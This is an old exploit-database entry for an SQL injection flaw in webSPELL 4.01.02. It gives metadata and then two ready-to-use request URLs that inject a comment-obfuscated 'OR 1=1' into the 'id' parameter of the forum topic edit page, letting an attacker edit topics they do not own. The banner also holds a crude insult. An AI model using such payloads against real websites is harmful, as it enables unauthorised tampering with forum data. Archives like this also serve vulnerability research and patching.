webSPELL 4.01.02 - 'id' Remote Edit Topics

EDB-ID:

7657

CVE:

N/A

Author:

StAkeR

Type:

webapps

Platform:

PHP

Published:

2009-01-04

+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
|  webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability  |      Note       |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| discovered by athos - staker[at]hotmail[dot]it              | magic quotes 0  |       
| download on http://wesbpell.org                             | enjoy your aids |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+--=--=--=--=--=-=+
| Exploit                                                                       |
| index.php?site=forum_topic&topic=[ID]&edit=true&id=1/**/%27/**/OR/**/1=1/*    |
| index.php?site=forum_topic&topic=1&edit=true&id=1/**/%27/**/OR/**/1=1/*       |
+=--=--=--=--=--+--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+-=--=--=--=--=--=+
                | http://www.youtube.com/watch?v=SY1SwqLOC3c |
                +--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+

# milw0rm.com [2009-01-04]